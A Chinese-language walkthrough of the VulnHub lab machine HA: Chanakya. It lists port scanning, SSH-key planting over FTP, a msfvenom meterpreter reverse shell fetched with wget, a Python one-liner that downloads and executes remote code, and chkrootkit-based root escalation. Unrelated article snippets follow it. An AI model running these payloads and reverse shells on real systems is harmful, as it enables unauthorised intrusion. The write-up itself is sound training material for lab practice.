chanakya
仅供个人娱乐
参考http://www.saulgoodman.cn/HA-Chanakya.html
靶机信息
https://www.vulnhub.com/entry/ha-chanakya,395/
一、主机探测
arp-scan -l
nmap -sV -p 1-65535 -A 192.168.236.136
dirb http://192.168.236.136
二、漏洞的查找和利用
百度 得到ROT13的加密方式
pcap流量包,直接下载即可
ashoka kautilya
首先进行21端口登录
22端口登陆失败
创建ssh-keygen
上传.ssh 使用kali免密登录
ssh-keygen
然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
mkdir .ssh
cd.ssh
put authorized_keys
root@kali:~/.ssh# ssh ashoka@192.168.236.136
提权
先msf生成一个木马反弹一个meterpreter回话过来
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf
python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129
cd /tmp
wget http://192.168.236.129:8000/shell.elf
sysinfo
使用post模块来查看可以利用那些提权exploit:
run post/multi/recon/local_exploit_suggester
info exploit/linux/local/netfilter_priv_esc_ipv4
失败
使用命令注入来反弹一个shell:
use exploit/multi/script/web_delivery
set lhost 192.168.236.129
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"
在目标机运行:
使用rootkit攻击模块:
这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c'import pty;pty.spawn("/bin/bash")'
参考文章http://www.saulgoodman.cn/HA-Chanakya.html
chanakya的更多相关文章
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- HA: Chanakya Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 ...
随机推荐
- NOIP模拟测试39,思维禁锢专场「工业题·玄学题·卡常题」
工业题 题解 抱歉,题解没时间写了 代码 #include<bits/stdc++.h> using namespace std; #define ll long long #define ...
- 数位dp从会打模板到不会打模板
打了几个数位$dp$,发现自己除了会打模板之外没有任何长进,遇到非模板题依然什么都不会 那么接下来这篇文章将介绍如何打模板(滑稽) 假设我们要处理$l----r$ 采用记忆化搜索的方式,枚举$< ...
- Centos8.3、proxysql2.0读写分离实战记录
接着主从复制继续往下讲,这个项目中我是使用proxysql做读写分离的中间件,之前是使用mycat.老实说mycat属于比较重量级的中间件,1.0还好到了2.0配置变得很复杂而且文档不是很齐全,我看着 ...
- Tomcat与spring的类加载器案例
Tomcat与spring的类加载器案例接下来将介绍<深入理解java虚拟机>一书中的案例,并解答它所提出的问题.(部分类容来自于书中原文) Tomcat中的类加载器在Tomcat目录结构 ...
- N沟通场效应管深度图解(1)工作原理及Multisim实例仿真
场效应晶体管(Field Effect Transistor, FET)简称场效应管,是一种由多数载流子参与导电的半导体器件,也称为单极型晶体管,它主要分型场效应管(Junction FET, JFE ...
- Golang修改操作系统时间
Golang修改操作系统时间 需求 程序有时需要和服务器对时,发现延迟过高修改本地时间,这段代码网上抄的,实测可用,windows环境需要以管理员身份启动命令提示符调试 实现Demo package ...
- 利用 V8 深入理解 JavaScript 设计
JavaScript 代码运行 以大家开发常用的 chrome 浏览器或 Node 举例,我们的 JavaScript 代码是通过 V8 运行的.但 V8 是怎么执行代码的呢?当我们输入 const ...
- 24 shell 管道命令与过滤器
1.管道命令的用法 2.使用管道命令的好处: 3.重定向和管道的区别 4.Linux管道实例 5.管道与重定向 1)管道与输入重定向 2)管道与输出重定向 6.过滤器 7.过滤器举栗 1.管道命令的用 ...
- tcp三次握手四次挥手----转
序列号seq:占4个字节,用来标记数据段的顺序,TCP把连接中发送的所有数据字节都编上一个序号,第一个字节的编号由本地随机产生:给字节编上序号后,就给每一个报文段指派一个序号:序列号seq就是这个报文 ...
- Java基础——自己的总结
Java Java是什么? Java是一门面向对象编程语言,不仅吸收了C++语言的各种优点,还摒弃了C++里难以理解的多继承.指针等概念,因此Java语言具有功能强大和简单易用两个特征.Java语言作 ...